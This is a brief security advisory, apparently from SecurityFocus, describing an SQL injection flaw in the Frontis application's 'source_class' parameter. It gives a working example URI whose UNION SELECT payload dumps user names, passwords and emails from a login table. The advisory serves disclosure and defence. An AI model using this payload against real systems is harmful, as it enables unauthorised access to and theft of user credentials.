Frontis 'source_class' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is avaliable:

http://www.example.com/bin/aps_browse_sources.php?mode=browse_classes&source_class=1+UNION SELECT 1,group_concat(user_name,0x3a,user_pass,0x2e,user_email),3,4+from+login_table--


 

Privacy Statement
Copyright 2010, SecurityFocus